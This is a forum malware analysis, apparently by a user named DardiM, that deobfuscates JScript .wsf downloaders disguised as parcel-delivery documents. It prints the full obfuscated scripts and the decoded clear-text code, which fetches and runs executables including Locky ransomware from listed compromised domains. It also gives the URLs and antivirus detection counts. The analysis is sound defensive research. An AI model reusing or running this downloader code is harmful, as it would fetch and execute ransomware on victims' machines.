http://domaine4/counter/?i=LXB76Wmr-KAV4AvmijAj-D2-4mmIQs9_fnJwrpOWmdOm2oN_pSSIqogJgRiEagXXjZjJHeiXcM6L36bV6MdACTU&a=18nHQkcmM2HvV7pqRzAStNNrmNGpUe8hfX&r=31
http://domaine5/counter/?i=LXB76Wmr-KAV4AvmijAj-D2-4mmIQs9_fnJwrpOWmdOm2oN_pSSIqogJgRiEagXXjZjJHeiXcM6L36bV6MdACTU&a=18nHQkcmM2HvV7pqRzAStNNrmNGpUe8hfX&r=41​

​

a2.exe :

http://domaine1/counter/?i=LXB76Wmr-KAV4AvmijAj-D2-4mmIQs9_fnJwrpOWmdOm2oN_pSSIqogJgRiEagXXjZjJHeiXcM6L36bV6MdACTU&a=18nHQkcmM2HvV7pqRzAStNNrmNGpUe8hfX&r=02
http://domaine2/counter/?i=LXB76Wmr-KAV4AvmijAj-D2-4mmIQs9_fnJwrpOWmdOm2oN_pSSIqogJgRiEagXXjZjJHeiXcM6L36bV6MdACTU&a=18nHQkcmM2HvV7pqRzAStNNrmNGpUe8hfX&r=12
http://domaine3/counter/?i=LXB76Wmr-KAV4AvmijAj-D2-4mmIQs9_fnJwrpOWmdOm2oN_pSSIqogJgRiEagXXjZjJHeiXcM6L36bV6MdACTU&a=18nHQkcmM2HvV7pqRzAStNNrmNGpUe8hfX&r=22
http://domaine4/counter/?i=LXB76Wmr-KAV4AvmijAj-D2-4mmIQs9_fnJwrpOWmdOm2oN_pSSIqogJgRiEagXXjZjJHeiXcM6L36bV6MdACTU&a=18nHQkcmM2HvV7pqRzAStNNrmNGpUe8hfX&r=32
http://domaine5/counter/?i=LXB76Wmr-KAV4AvmijAj-D2-4mmIQs9_fnJwrpOWmdOm2oN_pSSIqogJgRiEagXXjZjJHeiXcM6L36bV6MdACTU&a=18nHQkcmM2HvV7pqRzAStNNrmNGpUe8hfX&r=42​

Payload :

Path : %TEMP% (example : C:\Users\DardiM\AppData\Local\Temp)​

a1.exe : TR/Crypt.ZPACK.mrnaq

8/56
Antivirus scan for 42a9e9165e3d35cd7b6481e34ab114bf6014a51e16c409402311f0ee8091752f at 2016-12-20 22:18:19 UTC - VirusTotal

​

a2.exe : TR/Crypt.Xpack.wwrnp

12/56
Antivirus scan for 649e98d0771b04f53389a36bbf7cbcbe6af871a08c481da26a5f499b65e722ae at 2016-12-20 22:20:24 UTC - VirusTotal​

 

[DardiM]

From MV 02_01_2016 : https://malwaretips.com/threads/2-1-2017-6.67116/
Thanks to @silversurfer

Undelivered-Parcel-ID-0000525244.doc.wsf

1) What it looks like :

The code is a bit longer than the previous samples.

<job>

<script language=JScript>

function rox() {

return "5525262";

=> IMPORTANT : this value is put in a parameter of the complete URL, to represent the value that will replace the "a" in the response text, after the http request.​

};

function gag() {

return "Msxml2.XMLHTTP";

=> String that will be used to create the http object, used to for the http request​

};
var x = new Array(

"windycrestrental.com",
"vousgagnezaetreconnu.autoportrait.com",
"zodia-q.com",
"cobycaresfoundation.org",
"www .yabaojiuhe.com"​

);

=> Array of the domains that will be used to build the complete URLs for the requests

​

function rov() {

return "counter";

=> one of the part added for the completes URLs​

}

function cou() {

return "/" + rov() + "/?a=";

=> returns "/counter/?a=" : another part for the complete URLs​

};

function fiv() {

return "a";

=> returns "a" : for the char replacement on the string text received after the http request
=> will replace the obfuscated part : 5525262​

};

function cay(z) {

z = z.split(rox());
z = z.join(fiv());

=> similar to a replace of all rox() content ( "5525262") by fiv() '("a") on the encoded string received
=> first deobfuscation​

eval(z);

=> here, the obfuscated text received,is evaluated / run, after the first deobfuscation
=> I will show later its content : a string with fonction that build a var a , another string, will real malware part (downloader of payloads and run)​

};

function boe() {

return "&i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw";

=> another parameter+ value for the URLs built​

};

function htt() {

return "http://";

=> returns the first part of the future URLs
​

};

function sut() {

return "19eQysboVPoPcZhbbztVQDcdfSzNu5t45a&m=";

=> a part of the future URLs (value of precedent parameter not present here + parameter without its value)​

};

function tog(x) {

return htt() + x + cou() + sut() + rox() + boe();

=> function used to build the whole URL with one domain as parameter
=> function called from the loop for below
​

};
for (var i = 0; i < 5; i++) {

try {

var e = new ActiveXObject(gag());

=> e = ActiveXObject("Msxml2.XMLHTTP")
=> e : http object

​

e.open("GET", tog(x[ i ]), false);

=> http.open("GET", complete_URL_current_index ,false)
=> opens a connection to the current built URL

x[ i ] : domain from array, with current index i (i = 0 to 4 max)

tog(x[ i ]) : htt() + x + cou() + sut() + rox() + boe();

=> "http://" + current_domain + "/" + "counter" + "/?a= + "19eQysboVPoPcZhbbztVQDcdfSzNu5t45a&m=" + "5525262" +
"&i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw"

=> will try will each domain from the array seen above, until it findq a working one.

http://domain/counter/?a=19eQysboVPoPcZhbbztVQDcdfSzNu5t45a&m=5525262&i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw

Remember the domains :

var x = new Array(

"windycrestrental.com",
"vousgagnezaetreconnu.autoportrait.com",
"zodia-q.com",
"cobycaresfoundation.org",
"www .yabaojiuhe.com"​

);​

​

e.send();

=> sends the request

​

if (e.status == 200) {

=> status of the http request : 200 => OK : connection was a success !

​

cay(e.responseText);

=> calls the function that will deobuscate the text received​

break;
};​

} catch (e) {};​

};​

</script>​

</job>

2) The string received :

Before modification.
We can remark that 5525262 appears a lot of time : remember it was a parameter passed to the URL used as request. The webpage uses this value to obfuscated the real string. Here, each 5525262 is a 'a'

v5525262r 5525262 = ""; 5525262 += 'v5525262r 5525262d='; 5525262 += '"19eQysboVPoPcZhbbztVQDcdfSzNu5t455525262"; v5525262r '; 5525262 += 'ld=0; v'; 5525262 += '5525262r cs=St'; 5525262 += 'ring.from'; 5525262 += 'Ch5525262rCode(9'; 5525262 += '2); v5525262r'; 5525262 += ' ll=["vous'; 5525262 += 'g5525262gnez5525262e'; 5525262 += 'treco'; 5525262 += 'nnu.5525262u'; 5525262 += 'toportr5525262it'; 5525262 += '.com","'; 5525262 += 'www.sport'; 5525262 += 'provo'; 5525262 += 'king.'; 5525262 += 'com","s'; 5525262 += '5525262bedori55252625525262l'; 5525262 += 'tern5525262tiv5525262.'; 5525262 += 'pt","m5525262ggi'; 5525262 += 'eellisbusi'; 5525262 += 'nessco'; 5525262 += 'nsulting.'; 5525262 += 'com",'; 5525262 += '"infl5525262'; 5525262 += 'tion.'; 5525262 += 'us"]; v5525262r '; 5525262 += 'ws=WScript'; 5525262 += '.Cre5525262'; 5525262 += 'teObject('; 5525262 += '"WScript.S'; 5525262 += 'hell"); '; 5525262 += 'v5525262r fn=ws'; 5525262 += '.Exp5525262ndEn'; 5525262 += 'vironme'; 5525262 += 'ntString'; 5525262 += 's("%TE'; 5525262 += 'MP%")+c'; 5525262 += 's+"5525262"; '; 5525262 += 'v5525262r xo=WSc'; 5525262 += 'ript.Cre'; 5525262 += '5525262teObjec'; 5525262 += 't("Msxm'; 5525262 += 'l2.XMLHTTP'; 5525262 += '"); v'; 5525262 += '5525262r x5525262=WScr'; 5525262 += 'ipt.Cre5525262'; 5525262 += 'teObject('; 5525262 += '"ADODB'; 5525262 += '.Stre5525262m'; 5525262 += '"); v5525262r'; 5525262 += ' fo=WSc'; 5525262 += 'ript.Cr'; 5525262 += 'e5525262teO'; 5525262 += 'bject('; 5525262 += '"Scriptin'; 5525262 += 'g.File'; 5525262 += 'SystemObj'; 5525262 += 'ect"); if'; 5525262 += ' (!fo'; 5525262 += '.FileEx'; 5525262 += 'ists(f'; 5525262 += 'n+".t'; 5525262 += 'xt")) '; 5525262 += '{ v5525262r f'; 5525262 += 'p=fo.C'; 5525262 += 're5525262teT'; 5525262 += 'extFile(fn'; 5525262 += '+".tx'; 5525262 += 't",true);'; 5525262 += ' fp.WriteL'; 5525262 += 'ine(""); '; 5525262 += 'fp.Clos'; 5525262 += 'e(); for'; 5525262 += '(v5525262r n='; 5525262 += '1;n<=2;n'; 5525262 += '++) {'; 5525262 += ' for(v'; 5525262 += '5525262r i=ld;'; 5525262 += 'i<ll.'; 5525262 += 'length'; 5525262 += ';i++) {'; 5525262 += ' v5525262r d'; 5525262 += 'n=0; tr'; 5525262 += 'y { xo.op'; 5525262 += 'en("GET"'; 5525262 += ',"http://'; 5525262 += '"+ll['; 5525262 += 'i]+"/cou'; 5525262 += 'nter/?i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwUL5525262xvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw&'; 5525262 += '5525262="+5525262d+"&r'; 5525262 += '="+i+n, '; 5525262 += 'f5525262lse); '; 5525262 += 'xo.send();'; 5525262 += ' if(xo.s'; 5525262 += 't5525262tus==2'; 5525262 += '00) { x5525262'; 5525262 += '.open();'; 5525262 += ' x5525262.type='; 5525262 += '1; x5525262'; 5525262 += '.write(xo'; 5525262 += '.respons'; 5525262 += 'eBody); i'; 5525262 += 'f(x5525262.size'; 5525262 += '>1000'; 5525262 += '0) { dn'; 5525262 += '=1; x5525262.'; 5525262 += 's5525262veToFil'; 5525262 += 'e(fn+n+".'; 5525262 += 'exe",'; 5525262 += '2); try{'; 5525262 += 'ws.Ru'; 5525262 += 'n(fn+'; 5525262 += 'n+".exe"'; 5525262 += ',1,0);}'; 5525262 += 'c5525262tch'; 5525262 += '(er){}; };'; 5525262 += ' x5525262.close('; 5525262 += '); }; '; 5525262 += 'if(dn'; 5525262 += '==1){'; 5525262 += 'ld=i;bre5525262'; 5525262 += 'k;}; } '; 5525262 += 'c5525262tch('; 5525262 += 'er){}; };'; 5525262 += ' }; }'; 5525262 += ';'; //ev5525262l(5525262);

After first deobuscation and some formatting:

var a = "";
a += 'var a';
a += 'd="19eQysboVPoPcZhbbztVQDcdfSzNu5t45a"; va';
a += 'r ld=0; ';
a += 'var cs=St';
a += 'ring.from';
a += 'CharCo';
a += 'de(92)';
a += '; var ll=';
a += '["sabed';
a += 'oriaalte';
a += 'rnati';
a += 'va.pt",';
a += '"maggie';
a += 'ellisbus';
a += 'inessco';
a += 'nsulting';
a += '.com","ww';
a += 'w.sport';
a += 'provokin';
a += 'g.com","';
a += 'vousgagnez';
a += 'aetre';
a += 'connu.a';
a += 'utoportrai';
a += 't.com"';
a += ',"spiritdo';
a += 'ula.net"]';
a += '; var ws=W';
a += 'Script.C';
a += 'reate';
a += 'Object("WS';
a += 'cript';
a += '.Shell")';
a += '; var fn';
a += '=ws.Expa';
a += 'ndEnvir';
a += 'onmentStri';
a += 'ngs("%TEMP';
a += '%")+cs+"a"';
a += '; var xo';
a += '=WScript.';
a += 'CreateObje';
a += 'ct("Msxml2';
a += '.XMLHTTP")';
a += '; var xa=W';
a += 'Script';
a += '.CreateO';
a += 'bject("';
a += 'ADODB.';
a += 'Stream"); ';
a += 'var f';
a += 'o=WScrip';
a += 't.Create';
a += 'Object("Sc';
a += 'ripting';
a += '.FileSys';
a += 'temObject"';
a += '); if (!f';
a += 'o.FileE';
a += 'xists(fn';
a += '+".txt")) ';
a += '{ var f';
a += 'p=fo.Crea';
a += 'teTextFil';
a += 'e(fn+".t';
a += 'xt",t';
a += 'rue); fp';
a += '.WriteLine';
a += '("");';
a += ' fp.Cl';
a += 'ose();';
a += ' for(var ';
a += 'n=1;n<=';
a += '2;n++';
a += ') { for(v';
a += 'ar i=ld;i<';
a += 'll.le';
a += 'ngth;';
a += 'i++) {';
a += ' var dn';
a += '=0; try ';
a += '{ xo.op';
a += 'en("GE';
a += 'T","htt';
a += 'p://"+l';
a += 'l[i]+"/c';
a += 'ounte';
a += 'r/?i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw';
a += '&a="+';
a += 'ad+"&r';
a += '="+i+n';
a += ', false);';
a += ' xo.send';
a += '(); if';
a += '(xo.st';
a += 'atus==200';
a += ') { xa';
a += '.open';
a += '(); xa.ty';
a += 'pe=1; xa.w';
a += 'rite(x';
a += 'o.resp';
a += 'onseB';
a += 'ody);';
a += ' if(xa.';
a += 'size>';
a += '10000';
a += ') { dn=';
a += '1; xa.save';
a += 'ToFile(f';
a += 'n+n+".';
a += 'exe",2';
a += '); try{';
a += 'ws.Run(fn';
a += '+n+".';
a += 'exe",';
a += '1,0);}';
a += 'catch(';
a += 'er){}; }; ';
a += 'xa.cl';
a += 'ose(); }';
a += '; if(dn==1';
a += '){ld=i';
a += ';break';
a += ';}; } ';
a += 'catch(er){';
a += '}; }; }; }';
a += ';';
//eval(a);

3) The code in clear :

v
var ad = "19eQysboVPoPcZhbbztVQDcdfSzNu5t45a";
var ld = 0;
var cs = String.fromCharCode(92);
var ll = ["sabedoriaalternativa.pt", "maggieellisbusinessconsulting.com", "www.sportprovoking.com", "vousgagnezaetreconnu.autoportrait.com", "spiritdoula.net"];
var ws = WScript.CreateObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "a";
var xo = WScript.CreateObject("Msxml2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
var fo = WScript.CreateObject("Scripting.FileSystemObject");
if (!fo.FileExists(fn + ".txt")) {
    var fp = fo.CreateTextFile(fn + ".txt", true);
    fp.WriteLine("");
    fp.Close();
    for (var n = 1; n <= 2; n++) {
        for (var i = ld; i < ll.length; i++) {
            var dn = 0;
            try {
                xo.open("GET", "http://" + ll[i] + "/counter/?i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw&a=" + ad + "&r=" + i + n, false);
                xo.send();
                if (xo.status == 200) {
                    xa.open();
                    xa.type = 1;
                    xa.write(xo.responseBody);
                    if (xa.size > 10000) {
                        dn = 1;
                        xa.saveToFile(fn + n + ".exe", 2);
                        try {
                            ws.Run(fn + n + ".exe", 1, 0);
                        } catch (er) {};
                    };
                    xa.close();
                };
                if (dn == 1) {
                    ld = i;
                    break;
                };
            } catch (er) {};
        };
    };
};
};

4) Details :

var ad = "19eQysboVPoPcZhbbztVQDcdfSzNu5t45a";

=> value used as parameter of the futures URLS
​

var ld = 0;

=> initial index for loop on domainds
​

var cs = String.fromCharCode(92);

=> char : \​

var ll = [

"sabedoriaalternativa.pt",
"maggieellisbusinessconsulting.com",
"w w w .sportprovoking.com",
"vousgagnezaetreconnu.autoportrait.com",
"spiritdoula.net"​

];

=> array of domains to be used to download the payloads​

var ws = WScript.CreateObject("WScript.Shell");

=> creates a Shell object Shell to use later its run method : run the payloads​

var fn = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "a";

=> fn : filename : %TEMP% \ a

​

example : C:\Users\DardiM\AppData\Local\Temp\a​

var xo = WScript.CreateObject("Msxml2.XMLHTTP");

=> creates a http object, for the request : to try to download the two payloads​

var xa = WScript.CreateObject("ADODB.Stream");

=> Creates a Stream object, to store the received from the request, and save it to a local file
​

var fo = WScript.CreateObject("Scripting.FileSystemObject");

=> creates an object to manipulate file /folder
​

if (!fo.FileExists(fn + ".txt")) {

=> Example : test if C:\Users\DardiM\AppData\Local\Temp\a.txt exists : if yes, job already done
=> this a.txt file is used as clue to know if this deobfuscated part has already be run.​

var fp = fo.CreateTextFile(fn + ".txt", true);

=> Example : creates C:\Users\DardiM\AppData\Local\Temp\a.txt

​

fp.WriteLine("");

=> Write a blank line on a.txt

​

fp.Close();

=> closes a.txt


Here, the two nested loops to dowlooad the two payload (a1.exe and a2.exe) :
- First loop for the payload (two available) : n : 1 and 2
- Second loop for the URL built : 5 available : i : 0 , 1, 2, 3, 4

for (var n = 1; n <= 2; n++) {

for (var i = ld; i < ll.length; i++) {
var dn = 0;
try {
xo.open("GET", "http://" + ll[ i ] + "/counter/?i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw&a=" + ad + "&r=" + i + n, false);

=> builds the URL for current payload and domain, and open the http request
=> ll[ i ] : i => current index => retrieve the correspondent domain from the array
=> the complete URL will take into account the current payload needed, the current domain and some parameters
(See the first post for details, and the conclusion of this current post for all possibilities.

Remember :

var ll = [

"sabedoriaalternativa.pt",
"maggieellisbusinessconsulting.com",
"w w w .sportprovoking.com",
"vousgagnezaetreconnu.autoportrait.com",
"spiritdoula.net"​

];​

xo.send();

=> sends the request

​

if (xo.status == 200) {

=> 200 : request OK :

​

xa.open();

=> opens the stream

​

xa.type = 1;

=> 1 : data that will be store inside the stream have to be considered as binary

​

xa.write(xo.responseBody);

=> stores on the stream object the data received bt the request : the payload data

​

if (xa.size > 10000) {

=> if size is > 10000 : considered as a valid payload
dn = 1;

=> flag (=clue) to remember the current payload has been successfully downloaded
=> the current URLwill be used for the next payload, because it is a working URL

​

xa.saveToFile(fn + n + ".exe", 2);

=> saves to a file the current payload

=> Example :

- C:\Users\DardiM\AppData\Local\Temp\a1.exe
- C:\Users\DardiM\AppData\Local\Temp\a2.exe​

​

try {

ws.Run(fn + n + ".exe", 1, 0);

=> runs the current payload

​

} catch (er) {};​

};
xa.close();

=> closes the stream object, use to store the data from the http request, and to save them to a exe file on HD​

};
if (dn == 1) {

=> flag (=clue) to remember the current payload has been successfully downloaded​

ld = i;

=> the current URL will be used for the next payload, because it is a working URL​

break;
};​

} catch (er) {};​

};​

};​

};

5) Conclusion

First script : some differences with other samples analized before.
Deobuscated downloaded part : exactly the same method used than in the previous samples, only the URLs are different.

URLs to download the JScript code :

Domains :

windycrestrental.com
vousgagnezaetreconnu.autoportrait.com
zodia-q.com
cobycaresfoundation.org
www. yabaojiuhe.com​

​

http://domain/counter/?a=19eQysboVPoPcZhbbztVQDcdfSzNu5t45a&m=5525262&i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw​

5525262 : the part that replace the char 'a' in the received text from http request​

URLs to download the Payloads :

Domains :

​

sabedoriaalternativa.pt
maggieellisbusinessconsulting.com
www .sportprovoking.com
vousgagnezaetreconnu.autoportrait.com
spiritdoula.net
​

a1.exe :

http://domain1/counter/?i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw&a=19eQysboVPoPcZhbbztVQDcdfSzNu5t45a&r=01
http://domain2/counter/?i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw&a=19eQysboVPoPcZhbbztVQDcdfSzNu5t45a&r=11
http://domain3/counter/?i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw&a=19eQysboVPoPcZhbbztVQDcdfSzNu5t45a&r=21
http://domain4/counter/?i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw&a=19eQysboVPoPcZhbbztVQDcdfSzNu5t45a&r=31
http://domain5/counter/?i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw&a=19eQysboVPoPcZhbbztVQDcdfSzNu5t45a&r=41​

​

a2.exe :

http://domain1/counter/?i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw&a=19eQysboVPoPcZhbbztVQDcdfSzNu5t45a&r=02
http://domain2/counter/?i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw&a=19eQysboVPoPcZhbbztVQDcdfSzNu5t45a&r=12
http://domain3/counter/?i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw&a=19eQysboVPoPcZhbbztVQDcdfSzNu5t45a&r=22
http://domain4/counter/?i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw&a=19eQysboVPoPcZhbbztVQDcdfSzNu5t45a&r=32
http://domain5/counter/?i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw&a=19eQysboVPoPcZhbbztVQDcdfSzNu5t45a&r=42​

Payloads :

a1.exe :

5/54
Antivirus scan for a24eccecbe341d631c4d4b5f76ecfa2ad7fa04d1953d60827dd8aa13c90e5178 at 2017-01-03 13:25:40 UTC - VirusTotal​

a2.exe :​

12/55
Antivirus scan for f7587759257704644c436f65eeb2ee0ca5150106e94f382d15a2d251c1e0021f at 2017-01-03 13:28:21 UTC - VirusTotal​

 

[DardiM]

From https://malwaretips.com/threads/13-01-2016-22.67512/
Thanks to @Der.Reisende

Item-Delivery-Details-00000629997.doc.wsf

Why this sample ?
Because new modifications have been made on the downloader.

As usual : modifications have been made to avoid copy-paste => run => infection

<job>

<script language=JScript>

var z2 = eval;
var x = new Array("sergeytattoo.ru", "ru.ifo.su", "vensa.nl", "quatresaisonsaujardin.com", "eternitydevelop.heyshop.eu");
var m = "4734489";
var z3 = "?a=1NUDeZyyvDv3aBr2vKRjE25nvcVgLynWPj&m=";
z3 += m;
var z1 = "Msxml2.XMLHTTP";
z3 += "&i=TZB_8hCq_t5o48lnidKZRLm_Z2xo38j_fIrO1QiQe7LH5ft8IiKP0onur8RpOnF_PfHlN8e8WOWkNgtnXA";
for (var i = 0; i < 5; i++) {

try {

var e = new ActiveXObject(z1);
var z4 = z2;
e.open("GET", "http ://" + x[ i ] + "/counter/" + z3, false);
e.send();​

if (e.status == 2 * 100) {

z4(e.responseText.split(m).join("a"));
break;
};​

} catch (e) {};​

};​

</script>​

</job>

The method used on previous samples :

- tries to download from different urls (if needed) an obfuscated text,
- saved it as string once deobfuscated,
- eval the string to run the real "bad" part : the downloader and runner of a1.exe and a2.exe : 2 payloads (always these names are used)

​

Here, the main change are :

var z2 = eval;

var z4 = z2;

z4(e.responseText.split(m).join("a"));

​

=> it tries to hide the evaluation on var z4 .
=> the received text is not saved in a var : directly deobfuscated and run.

z4(e.responseText.split(m).join("a"));

is :

eval(http.responseTex.split("4734489").join("a"))

=> evaluates the received string after have replaced all "4734489" by "a" <=> .split("4734489").join("a")

​

Domains used :

var x = new Array(

"sergeytattoo.ru",
"ru.ifo.su", "vensa.nl",
"quatresaisonsaujardin.com",
"eternitydevelop.heyshop.eu"​

);

​

URLs built :

http ://domain/counter/?a=1NUDeZyyvDv3aBr2vKRjE25nvcVgLynWPj&m=4734489&i=TZB_8hCq_t5o48lnidKZRLm_Z2xo38j_fIrO1QiQe7LH5ft8IiKP0onur8RpOnF_PfHlN8e8WOWkNgtnXA

​

String received :

"var a = ""; a += 'var ad="1NUDeZyyvDv3aBr2vKRjE25nvcVgLynWPj"'; a += '; var ld=0'; a += '; var c'; a += 's=Stri'; a += 'ng.fro'; a += 'mCharCode('; a += '92); var'; a += ' ll=["lacr'; a += 'ossetr'; a += 'avel.com",'; a += '"sergey'; a += 'tattoo'; a += '.ru","no'; a += 'bilisasse'; a += 'ssoria.co'; a += 'm.br","ru.'; a += 'ifo.su"'; a += ',"cecichu'; a += 'rrascoemdo'; a += 'micili'; a += 'o.com.'; a += 'br"]; var'; a += ' ws=WScr'; a += 'ipt.C'; a += 'reate'; a += 'Object("W'; a += 'Script'; a += '.Shell");'; a += ' var fn='; a += 'ws.Ex'; a += 'pandEnviro'; a += 'nmentStri'; a += 'ngs("%'; a += 'TEMP%'; a += '")+cs'; a += '+"a"; var'; a += ' xo=WScr'; a += 'ipt.Create'; a += 'Objec'; a += 't("Msx'; a += 'ml2.XMLHTT'; a += 'P"); var'; a += ' xa=WSc'; a += 'ript.Cre'; a += 'ateObject('; a += '"ADOD'; a += 'B.Stre'; a += 'am"); v'; a += 'ar fo=WScr'; a += 'ipt.Create'; a += 'Object("'; a += 'Scripti'; a += 'ng.FileS'; a += 'ystemObjec'; a += 't"); if '; a += '(!fo.Fi'; a += 'leExi'; a += 'sts(fn+".t'; a += 'xt")) '; a += '{ var fp'; a += '=fo.Crea'; a += 'teText'; a += 'File(fn'; a += '+".txt",tr'; a += 'ue); f'; a += 'p.Wri'; a += 'teLine('; a += '""); f'; a += 'p.Close('; a += '); for(va'; a += 'r n=1'; a += ';n<=2;'; a += 'n++) {'; a += ' for(va'; a += 'r i=ld;i'; a += '<ll.leng'; a += 'th;i++'; a += ') { va'; a += 'r dn=0;'; a += ' try { x'; a += 'o.open("'; a += 'GET","htt'; a += 'p://"+ll[i'; a += ']+"/counte'; a += 'r/?i=TZB_8hCq_t5o48lnidKZRLm_Z2xo38j_fIrO1QiQe7LH5ft8IiKP0onur8RpOnF_PfHlN8e8WOWkNgtnXA&'; a += 'a="+ad+"&'; a += 'r="+i+n,'; a += ' false);'; a += ' xo.se'; a += 'nd();'; a += ' if(xo.st'; a += 'atus==200)'; a += ' { xa.'; a += 'open(); xa'; a += '.type='; a += '1; xa'; a += '.write('; a += 'xo.res'; a += 'ponse'; a += 'Body)'; a += '; if(x'; a += 'a.size>1'; a += '0000) { dn'; a += '=1; xa.s'; a += 'aveToFi'; a += 'le(fn+n'; a += '+".exe",2)'; a += '; try{'; a += 'ws.Run(fn+'; a += 'n+".exe",'; a += '1,0);'; a += '}catch(er'; a += '){}; }; '; a += 'xa.close('; a += '); };'; a += ' if(dn==1)'; a += '{ld=i'; a += ';break'; a += ';}; } c'; a += 'atch(er)'; a += '{}; }; }; '; a += '};'; _eval(a);"

=> at the end : eval(a)
=> builds a new string and runs it.

It is the same deobfuscated downloader that have been seen on previous post, so I will only show domains & URLs used:

Domains used:

var ll = [

"lacrossetravel.com",
"sergeytattoo.ru",
"nobilisassessoria.com.br",
"ru.ifo.su",
"cecichurrascoemdomicilio.com.br"​

];​

All available URLs to download a1.exe :

http ://domain1/counter/?i=TZB_8hCq_t5o48lnidKZRLm_Z2xo38j_fIrO1QiQe7LH5ft8IiKP0onur8RpOnF_PfHlN8e8WOWkNgtnXA&a=1NUDeZyyvDv3aBr2vKRjE25nvcVgLynWPj&r=01
http ://domain2/counter/?i=TZB_8hCq_t5o48lnidKZRLm_Z2xo38j_fIrO1QiQe7LH5ft8IiKP0onur8RpOnF_PfHlN8e8WOWkNgtnXA&a=1NUDeZyyvDv3aBr2vKRjE25nvcVgLynWPj&r=11
http ://domain3/counter/?i=TZB_8hCq_t5o48lnidKZRLm_Z2xo38j_fIrO1QiQe7LH5ft8IiKP0onur8RpOnF_PfHlN8e8WOWkNgtnXA&a=1NUDeZyyvDv3aBr2vKRjE25nvcVgLynWPj&r=21
http ://domain4/counter/?i=TZB_8hCq_t5o48lnidKZRLm_Z2xo38j_fIrO1QiQe7LH5ft8IiKP0onur8RpOnF_PfHlN8e8WOWkNgtnXA&a=1NUDeZyyvDv3aBr2vKRjE25nvcVgLynWPj&r=31
http ://domain5/counter/?i=TZB_8hCq_t5o48lnidKZRLm_Z2xo38j_fIrO1QiQe7LH5ft8IiKP0onur8RpOnF_PfHlN8e8WOWkNgtnXA&a=1NUDeZyyvDv3aBr2vKRjE25nvcVgLynWPj&r=41

​

All available URLs to download a2.exe :

http ://domain1/counter/?i=TZB_8hCq_t5o48lnidKZRLm_Z2xo38j_fIrO1QiQe7LH5ft8IiKP0onur8RpOnF_PfHlN8e8WOWkNgtnXA&a=1NUDeZyyvDv3aBr2vKRjE25nvcVgLynWPj&r=02"
"http ://domain2/counter/?i=TZB_8hCq_t5o48lnidKZRLm_Z2xo38j_fIrO1QiQe7LH5ft8IiKP0onur8RpOnF_PfHlN8e8WOWkNgtnXA&a=1NUDeZyyvDv3aBr2vKRjE25nvcVgLynWPj&r=12
http :/domain3r/counter/?i=TZB_8hCq_t5o48lnidKZRLm_Z2xo38j_fIrO1QiQe7LH5ft8IiKP0onur8RpOnF_PfHlN8e8WOWkNgtnXA&a=1NUDeZyyvDv3aBr2vKRjE25nvcVgLynWPj&r=22
http ://domain4/counter/?i=TZB_8hCq_t5o48lnidKZRLm_Z2xo38j_fIrO1QiQe7LH5ft8IiKP0onur8RpOnF_PfHlN8e8WOWkNgtnXA&a=1NUDeZyyvDv3aBr2vKRjE25nvcVgLynWPj&r=32
http ://domain5/counter/?i=TZB_8hCq_t5o48lnidKZRLm_Z2xo38j_fIrO1QiQe7LH5ft8IiKP0onur8RpOnF_PfHlN8e8WOWkNgtnXA&a=1NUDeZyyvDv3aBr2vKRjE25nvcVgLynWPj&r=42​

Payloads :

a1.exe : Locky ransomware

9/57
